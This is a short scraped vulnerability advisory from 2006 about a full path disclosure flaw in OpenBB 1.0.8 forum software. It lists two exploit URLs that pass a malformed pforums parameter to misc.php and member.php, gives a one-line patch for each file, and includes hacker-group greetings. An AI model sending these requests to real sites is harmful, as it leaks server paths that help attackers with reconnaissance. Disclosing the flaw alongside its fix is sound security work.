OpenBB 1.0.8 Full Path Disclosure

2006-05-0200:00:00

vulners.com

JSON

    Bug Found By :- Devil-00

Gr33tz :- Www.securitygurus.neT
                                    Rock Master
                    Hackers Pal
                    n0m3rcy

-= 1-2 =-

Full Path Disclosure

    Exploits :-
    /OpenBB/misc.php?action=latest&amp;pforums=D3vil-0x1
    /OpenBB/member.php?action=online&amp;&amp;pforums=D3vil-0x1

Fix It :-

misc.php

    Add This Line To &#39;36&#39; Line Number

[code]
$pforums = array(); # D3vil-0x1 Fix
[/code]

member.php

    Add This Line To &#39;759&#39; Line Number

[code]
$pforums = array(); # D3vil-0x1 Fix
[/code]

JSON